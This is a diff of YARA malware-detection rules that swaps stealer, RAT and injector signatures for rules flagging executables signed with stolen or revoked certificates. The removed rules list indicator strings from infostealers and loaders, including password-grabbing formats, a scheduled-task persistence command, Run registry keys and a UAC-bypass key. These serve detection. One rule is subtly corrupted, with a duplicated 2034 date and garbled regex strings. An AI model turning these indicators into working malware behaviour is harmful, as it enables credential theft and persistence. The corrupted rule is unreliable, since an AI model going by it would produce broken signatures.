+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "9b0a59e1-8105-5687-83b2-fb96229f59f9"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "80ee9422-190d-5a4e-9a4c-fb8d1b2e2f8c"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L9772-L9782"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4062-L4073"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "d14d53b2a73952244641f4e68a3dd5af8cb1e2bfc5936f300f9347b4881ceeb8"
+		logic_hash = "e5afd76711e1b466d7eba742f50c7f9551498796f0aca45566bd9686034efac3"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		clamav_sig = "MALWARE.Win.InvalidPrinter"
-
-	strings:
-		$s1 = "in2al5d p3in4er" fullword ascii
-		$s2 = "CreateDXGIFactory" fullword ascii
+		thumbprint = "05eebfec568abc5fc4b2fd9e5eca087b02e49f53"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 15000KB and all of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "POKEROWA STRUNA SP Z O O" and pe.signatures [ i ] . serial == "c6:50:ae:53:11:00:a9:13:89:a7:f0:30:22:8b:30:95" )
 }
-rule DITEKSHEN_MALWARE_Win_Raccoonv2 : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_4F8Ebbb263F3Cbe558D37118C43F8D58 : FILE
 {
 	meta:
-		description = "Detects Raccoon Stealer 2.0, also referred to as RecordBreaker"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "2fc8313f-42f4-5b7e-8ae6-20455f736064"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "c273f7e4-8c88-5205-be4b-3a8e8bed144e"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L9784-L9805"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4075-L4086"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "d47bb9051923147010452bcd6e7c370c2ff9ea9095bcb920b64f69873b15ec16"
+		logic_hash = "e502e7e08fa82f8bd1b2b15c34999ece6b3d59d75ab1a4dda05b4b9440c49b7c"
 		score = 75
-		quality = 25
+		quality = 75
 		tags = "FILE"
-
-	strings:
-		$f1 = "sgnl_" fullword ascii
-		$f2 = "tlgrm_" fullword ascii
-		$f3 = "ews_" fullword ascii
-		$f4 = "grbr_" fullword ascii
-		$f5 = "dscrd_" fullword ascii
-		$f6 = "wlts_" fullword ascii
-		$f7 = "scrnsht_" fullword ascii
-		$f8 = "sstmnfo_" fullword ascii
-		$s1 = "machineId=" fullword ascii
-		$s2 = "&configId=" fullword ascii
-		$s3 = "URL:%s" fullword ascii
-		$s4 = "USR:%s" fullword ascii
-		$s5 = "PASS:%s" fullword ascii
-		$s6 = "Content-Type: application/x-object" fullword ascii
+		thumbprint = "3f27a35fe7af06977138d02ad83ddbf13a67b7c3"
+		importance = 20
 
 	condition:
-		(( uint16( 0 ) == 0x5a4d and ( 4 of ( $f* ) or all of ( $s* ) or 7 of them ) ) or 10 of them )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Maxthon Technology Co, Ltd." and pe.signatures [ i ] . serial == "4f:8e:bb:b2:63:f3:cb:e5:58:d3:71:18:c4:3f:8d:58" )
 }
-rule DITEKSHEN_MALWARE_Win_Truebot : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_01Ea62E443Cb2250C870Ff6Bb13Ba98E : FILE
 {
 	meta:
-		description = "Detects TrueBot"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "7210a0bd-d310-55bf-bb0c-14cadb59bd67"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "40c5f73b-70b6-5db7-8060-01ad77e5f319"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L9807-L9827"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4088-L4099"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "a92141ef0aa7d68b3594a0f56c0370498fe5751a472c9011ac8b92ae46e88e53"
+		logic_hash = "dbf281989fb89976f83e0e2395f02c1e8c4c9ec5f96095786d9c6406518eb315"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "%s\\rundll32.exe" fullword wide
-		$s2 = "ChkdskExs" fullword wide
-		$s3 = "n=%s&o=%s&a=%d&u=%s&p=%s&d=%s" ascii
-		$s4 = "KLLS" fullword ascii
-		$s5 = "%s\\%08x-%08x.ps1" fullword ascii
-		$s6 = ".JSONIP" ascii
-		$s7 = "CreateProcessAsUserW res %d err %d" fullword ascii
-		$s8 = "ldr_sys64.dll" fullword ascii
-		$s9 = "SVCHOST" fullword ascii
-		$s10 = "WINLOGON" fullword ascii
-		$s11 = { 67 6f 6f 67 6c 65 2e 63 6f 6d 00 00 00 00 00 00
-                2f 00 63 00 20 00 64 00 65 00 6c 00 20 00 00 00
-                20 00 3e 00 3e 00 20 00 4e 00 55 00 4c 00 }
+		thumbprint = "f293eed3ff3d548262cddc43dce58cfc7f763622"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 6 of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Tencent Technology(Shenzhen) Company Limited" and pe.signatures [ i ] . serial == "01:ea:62:e4:43:cb:22:50:c8:70:ff:6b:b1:3b:a9:8e" )
 }
-rule DITEKSHEN_MALWARE_Win_Lummastealer : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_726Ee7F5999B9E8574Ec59969C04955C : FILE
 {
 	meta:
-		description = "Detects Lumma Stealer"
+		description = "Detects IntelliAdmin commercial remote administration signing certificate"
 		author = "ditekSHen"
-		id = "b54521ab-4a31-5c1c-8ef2-b08b0f713693"
-		date = "2034-02-17"
-		date = "2034-02-17"
-		modified = "2024-11-01"
+		id = "5e88abd2-97d5-5271-ace5-6b7cb2cd6633"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L9829-L9854"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4101-L4112"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "74014c5bcc85977b90faed93b348c34e47ee033b06c2f145348ca9c54c27bda5"
+		logic_hash = "494afa3711d93c56d52b8ae944db737cb53db8d27f2255c7045c3bf4478995a3"
 		score = 75
-		quality = 48
+		quality = 75
 		tags = "FILE"
-		clamav1 = "MALWARE.Win.Trojan.LummaStealer"
-
-	strings:
-		$x1 = /Lum[0-9]{3}xedmaC2,\sBuild/ ascii
-		$x2 = /LID\(Lu[0-9]{3}xedmma\sID\):/ ascii
-		$s1 = /os_c[0-9]{3}xedrypt\.encry[0-9]{3}xedpted_key/ fullword ascii
-		$s2 = "c2sock" wide
-		$s3 = "c2conf" wide
-		$s4 = "TeslaBrowser/" wide
-		$s5 = "Software.txt" fullword wide
-		$s6 = "SysmonDrv" fullword
-		$s7 = "*.eml" fullword wide nocase
-		$s8 = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall" wide
-		$s9 = "- Screen Resoluton:" ascii
-		$s10 = "lid=%s" ascii
-		$s11 = "&ver=" ascii
-		$s12 = "769cb9aa22f4ccc412f9cbc81feedd" fullword wide
-		$s13 = "gapi-node.io" fullword ascii
+		thumbprint = "2fb952bc1e3fcf85f68d6e2cb5fc46a519ce3fa9"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( all of ( $x* ) or ( 1 of ( $x* ) and 2 of ( $s* ) ) or 5 of ( $s* ) or 7 of them )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "IntelliAdmin, LLC" and pe.signatures [ i ] . serial == "72:6e:e7:f5:99:9b:9e:85:74:ec:59:96:9c:04:95:5c" )
 }
-rule DITEKSHEN_MALWARE_Win_Clipbanker03 : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_0A005D2E2Bcd4137168217D8C727747C : FILE
 {
 	meta:
-		description = "Detects ClipBanker"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "57ba7d33-eba4-5bc1-9893-5441e439b900"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "c3888d90-0c09-539a-9155-a60e4670320d"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L9884-L9904"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4114-L4125"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "29bbb833c9aecc18b398b8c0d80649994f4992277d1aa2ee4ae8e319b59125d5"
+		logic_hash = "b4024cd0d6c9a86d3956b9ba5d9692fc7ec2d7aa399a56a0b12f9387801a0b08"
 		score = 75
-		quality = 50
+		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "UNIC_KEY" fullword wide
-		$s2 = "[StartUp]" fullword wide
-		$s3 = "[Kill]" fullword wide
-		$s4 = "[antivm]" fullword wide
-		$s5 = "AntiVM" fullword ascii
-		$s6 = "AntiKill" fullword ascii
-		$s7 = "hWndRemove" fullword ascii
-		$s8 = "/Clip(watch|Chang|Mon)/" fullword ascii
-		$w1 = "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0" fullword wide
-		$w2 = "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0" fullword wide
-		$w3 = "/create /sc MINUTE /mo 1 /tn \"Windows Service\" /tr \"" fullword wide
-		$w4 = "Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon" fullword wide
-		$w5 = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run" fullword wide
+		thumbprint = "df788aa00eb400b552923518108eb1d4f5b7176b"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 5 of ( $s* ) or all of ( $w* ) or 6 of them )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Beijing JoinHope Image Technology Ltd." and pe.signatures [ i ] . serial == "0a:00:5d:2e:2b:cd:41:37:16:82:17:d8:c7:27:74:7c" )
 }
-rule DITEKSHEN_MALWARE_Win_Dotrunpex : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_00D3D74Ae548830D5B1Bca9856E16C564A : FILE
 {
 	meta:
-		description = "Detects dotRunpeX injector"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "4845edc1-110c-59a2-ace0-57a62b1e69e8"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "692ef744-9609-5cb1-b425-3bacf012fcdb"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L9906-L9918"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4127-L4138"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "d7f802f233b2b4ff2c250bb8e96649f307bbb3457c78004751401b3ea7f531a0"
+		logic_hash = "c72f10af530a6af4526ad956ef6058d097417a8fe3b902e3c7cba27b04e0c2c1"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "\\Registry\\Machine\\System\\CurrentControlSet\\Services\\TaskKill" fullword wide
-		$s2 = "KoiVM" ascii
-		$s3 = "RunpeX.Stub.Framework" wide
-		$s4 = "ExceptionServices.ExceptionDispatchInfo" wide
-		$s5 = "Kernel32.Dll" wide
+		thumbprint = "3f996b75900d566bc178f36b3f4968e2a08365e8"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and all of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Insite Software Inc." and pe.signatures [ i ] . serial == "00:d3:d7:4a:e5:48:83:0d:5b:1b:ca:98:56:e1:6c:56:4a" )
 }
-rule DITEKSHEN_MALWARE_Win_Cyberstealer : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_41F8253E1Ceafbfd8E49F32C34A68F9E : FILE
 {
 	meta:
-		description = "Detects CyberStealer infostealer"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "cb02013f-ffb2-5a17-9d6e-1d19b0e98fb8"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "84bd03de-88cd-5180-af11-916dbecd0366"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L9920-L9941"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4140-L4151"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "72413b68fa1381656202165dcd878761727e7caf0f15ccd65f3f2f842243a1f6"
+		logic_hash = "53f71030815dcdda8424fe858d26a08cf947a683e69c50ea5fda53f51b88bb93"
 		score = 75
-		quality = 71
+		quality = 75
 		tags = "FILE"
-
-	strings:
-		$x1 = "\\Cyber Stealer\\" ascii
-		$s1 = "[Virtualization]" fullword wide
-		$s2 = "\"encryptedPassword\":\"([^\"]+)\"" fullword wide
-		$s3 = "CreditCard" fullword ascii
-		$s4 = "DecryptPassword" fullword ascii
-		$s5 = "_modTime" fullword ascii
-		$s6 = "_pathname" fullword ascii
-		$s7 = "_pathnameInZip" fullword ascii
-		$s8 = "GetBookmarksDBPath" fullword ascii
-		$s9 = "GrabberImages" fullword ascii
-		$r1 = "^1[a-km-zA-HJ-NP-Z1-9]{25,34}$" wide
-		$r2 = "^3[a-km-zA-HJ-NP-Z1-9]{25,34}$" wide
-		$r3 = "^([a-zA-Z0-9_\\-\\.]+)@([a-zA-Z0-9_\\-\\.]+)\\.([a-zA-Z]{2,5})$" wide
-		$r4 = "^(?!:\\/\\/)([a-zA-Z0-9-_]+\\.)*[a-zA-Z0-9][a-zA-Z0-9-_]+\\.[a-zA-Z]{2,11}?$" wide
+		thumbprint = "02e739740b88328ac9c4a6de0ee703b7610f977b"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( ( 1 of ( $x* ) and ( 2 of ( $s* ) or 2 of ( $r* ) ) ) or 7 of ( $s* ) or ( 5 of ( $s* ) and 2 of ( $r* ) ) or ( all of ( $r* ) and 4 of ( $s* ) ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Shenzhen Smartspace Software technology Co.,Limited" and pe.signatures [ i ] . serial == "41:f8:25:3e:1c:ea:fb:fd:8e:49:f3:2c:34:a6:8f:9e" )
 }
-rule DITEKSHEN_MALWARE_Win_Arrowrat : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_0A5B4F67Ad8B22Afc2Debe6Ce5F8F679 : FILE
 {
 	meta:
-		description = "Detects ArrowRAT"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "14d3aabe-1ef5-599f-adbd-61b580099447"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "e1cc3d27-4f76-58a8-8dd6-fd8dbe48252e"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L9943-L9961"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4153-L4164"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "13e6d4fd274f75c50aa4110276812d02885c03cfc269dde480db66955e5f703a"
+		logic_hash = "19cf46c112b546c26f12891727fdbc74aaa78bbdcdbc4e041781394f4cf5f719"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "29mdHdhcmVcTWljcm9zb2Z0XFdpbmRvd3MgTlRcQ3VycmVudFZlcnNpb25cV2lubG9nb" wide
-		$s2 = "Software\\Classes\\ms-settings\\shell\\open\\command" wide
-		$s3 = "DelegateExecute" fullword wide
-		$s4 = "powershell" wide
-		$s5 = "DESKTOP_HOOKCONTROL" fullword ascii
-		$s6 = "PROCESS_INFORMATION" fullword ascii
-		$s7 = "STARTUP_INFORMATION" fullword ascii
-		$s8 = /(Venom|Pandora)\shVNC/ fullword wide
-		$s9 = "cmd.exe /k START" fullword wide
-		$s10 = "ExclusionWD" fullword ascii
-		$s11 = "WinExec" fullword ascii
+		thumbprint = "1213865af7ddac1568830748dbdda21498dfb0ba"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 5 of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Farad LLC" and pe.signatures [ i ] . serial == "0a:5b:4f:67:ad:8b:22:af:c2:de:be:6c:e5:f8:f6:79" )
 }
-rule DITEKSHEN_MALWARE_Win_Ducktail : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_65Cd323C2483668B90A44A711D2A6B98 : FILE
 {
 	meta:
-		description = "Detects DuckTail"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "2d1a8f9e-ed5f-53fa-8ba8-b6d1344f6d39"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "b976e930-cf9a-5b0f-9a1b-c35c3f134bdd"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L9963-L9991"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4166-L4177"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "a416212e5f87b33fdc14590c3d6d6ebc2915c2b383adf78d660c9408beb2323f"
+		logic_hash = "e0a9868f9a42aeb8f90aff540a73bc8fa1bfebbf8ee6c0c71bd921cf914e0875"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "&global_scope_id=" wide
-		$s2 = "#ResolveMyIpAll" wide
-		$s3 = "#ApproveInvitesHandler" wide
-		$s4 = "#ProcessShareCok" wide
-		$s5 = "#InviteEmpHandler" wide
-		$s6 = "__activeScenarioIDs=%" wide
-		$s7 = "&__a=1&fb_dtsg=" wide
-		$s8 = "adAccountLimit\":(.*?)}" wide
-		$s9 = "|PUSH|" fullword wide
-		$s10 = "|SCREEN|" fullword wide
-		$s11 = "|SCREEC|" fullword wide
-		$s12 = "_ad_accounts>k__" ascii
-		$s13 = "get_Pwds" fullword ascii
-		$s14 = "Telegram.Bot" ascii
-		$s15 = { 2f 00 7b 00 43 00 59 00 52 00 7d 00 2e 00 74 00
-               78 00 74 00 00 15 2f 00 7b 00 4c 00 4f 00 47 00
-               7d 00 2e 00 74 00 78 00 74 00 00 15 2f 00 7b 00
-               43 00 46 00 47 00 7d 00 2e 00 74 00 78 00 74 00
-               00 15 2f 00 7b 00 50 00 52 00 53 00 7d 00 2e 00
-               74 00 78 00 74 00 00 15 2f 00 7b 00 53 00 43 00
-               52 00 7d 00 2e 00 6a 00 70 00 67 }
+		thumbprint = "188810cf106a5f38fe8aa0d494cbd027da9edf97"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 13 of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OOO Giperion" and pe.signatures [ i ] . serial == "65:cd:32:3c:24:83:66:8b:90:a4:4a:71:1d:2a:6b:98" )
 }
-rule DITEKSHEN_MALWARE_Win_Grum : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_0F7E3Fda780E47E171864D8F5386Bc05 : FILE
 {
 	meta:
-		description = "Detect Grum spam bot"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "e9abaed1-f462-5099-b310-9f9244c0c8a2"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "33b8ce54-fa2c-5aac-9022-2309f7fc4a86"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L9993-L10007"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4192-L4203"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "42a1d57dcddda4a24037af136caace6110b90ee5702c7c01d2a77d2676048c74"
+		logic_hash = "30e2daf85ee7f9f9615a49af949a034b50a97a1a7abf6a318547809cc9e7b0b7"
 		score = 75
-		quality = 50
+		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "loader_id" fullword ascii
-		$s2 = "start_srv" fullword ascii
-		$s3 = "lid_file_upd" fullword ascii
-		$s4 = "----=_NextPart_%03d_%04X_%08.8lX.%08.8lX" fullword ascii
-		$s5 = "rcpt to:<%s>" fullword ascii
-		$s6 = "ehlo %s" fullword ascii
-		$s7 = "%OUTLOOK_BND_" fullword ascii
+		thumbprint = "1e3dd5576fc57fa2dd778221a60bd33f97087f74"
+		importance = 20
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and 5 of them ) or ( all of them )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Louhos Solutions Oy" and pe.signatures [ i ] . serial == "0f:7e:3f:da:78:0e:47:e1:71:86:4d:8f:53:86:bc:05" )
 }
-rule DITEKSHEN_MALWARE_Win_Dlinjector07 : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_C2Cbbd946Bc3Fdb944D522931D61D51A : FILE
 {
 	meta:
-		description = "Detects downloader injector"
+		description = "Detects executables signed with Sordum Software certificate, particularly Defender Control"
 		author = "ditekSHen"
-		id = "244ad6fb-8769-5b57-84e2-66f51fccb32a"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "b8ccfb1a-4e3f-5823-af38-e1607458023e"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L10009-L10025"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4231-L4242"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "aef43b59ef7d0d62a853280ec1588a48d6c21da5218b7fd7e6ab1aa0f048896b"
+		logic_hash = "6e67835cf85c713ef5a21b866a277e90236c607fb67d3fd9b2bba627c31d9e97"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
-
-	strings:
-		$x1 = "23lenrek[||]lldtn[||]daerhTemuseR[||]txetnoCdaerhTteS46woW[||]txetnoCdaerhTteS[||]txetnoCdaerhTteG46woW[||]txetnoCdaerhTteG[||]xEcollAlautriV[||]yromeMssecorPetirW[||]yromeMssecorPdaeR[||]noitceSfOweiVpamnUwZ[||]AssecorPetaerC" wide
-		$l1 = "[||]" wide
-		$r1 = "yromeMssecorPetirW" wide
-		$r2 = "xEcollAlautriV" wide
-		$r3 = "daerhTemuseR" ascii wide
-		$r4 = "noitceSfOweiVpamnUwZ" wide
-		$s1 = "Debugger Detected" fullword wide
-		$s2 = "payload" fullword ascii
-		$s3 = "_ENABLE_PROFILING" fullword wide
+		thumbprint = "f5e71628a478a248353bf0177395223d2c5a0e43"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 1 of ( $x* ) or ( 1 of ( $l* ) and 2 of ( $r* ) ) or 6 of them )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Sordum Software" and pe.signatures [ i ] . serial == "c2:cb:bd:94:6b:c3:fd:b9:44:d5:22:93:1d:61:d5:1a" )
 }
-rule DITEKSHEN_MALWARE_Win_Stealerium : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_6E3B09F43C3A0Fd53B7D600F08Fae2B5 : FILE
 {
 	meta:
-		description = "Detects Stealerium infostealer"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "ea137900-3add-54b4-9ce9-bc7e98f86d41"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "d23e7b9b-4424-50c5-a768-9cb33e0de192"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L10027-L10042"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4244-L4255"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "a2834e7fe26ad0197a9e490ab517029ceed2e09506fcc37e6ddf0c1804fa6cb9"
+		logic_hash = "45e2833dedacd875912d07dc63216400ddff76846f9c7bdf808f1db56ed4720c"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
-
-	strings:
-		$x1 = "Stealerium" ascii wide
-		$x2 = /\.Target\.(Passwords|Messengers|Browsers|VPN|Gaming)\./ ascii
-		$x3 = /\.Modules\.(Keylogger|Implant|Passwords|Messengers|Browsers|VPN|Gaming|Clipper)\./ ascii
-		$s1 = "Timeout /T 2 /Nobreak" fullword wide
-		$s2 = "Directory not exists" wide
-		$s3 = "### {0} ### ({1})" wide
-		$s4 = /---\s(AntiAnalysis|WebcamScreenshot|Keylogger|Clipper)/ wide
-		$s5 = " *Keylogger " fullword wide
+		thumbprint = "677054afcbfecb313f93f27ed159055dc1559ad0"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( all of ( $x* ) or ( 2 of ( $x* ) and all of ( $s* ) ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Divisible Limited" and pe.signatures [ i ] . serial == "6e:3b:09:f4:3c:3a:0f:d5:3b:7d:60:0f:08:fa:e2:b5" )
 }
-rule DITEKSHEN_MALWARE_Linux_Gobrat : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_00Aa12C95D2Bcde0Ce141C6F1145B0D7Ef : FILE
 {
 	meta:
-		description = "Detects GobRAT"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "0561fa99-24ee-5e02-ba54-17a1dd81daa4"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "66ef7681-7467-5c9f-8e0b-749a9711f15a"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
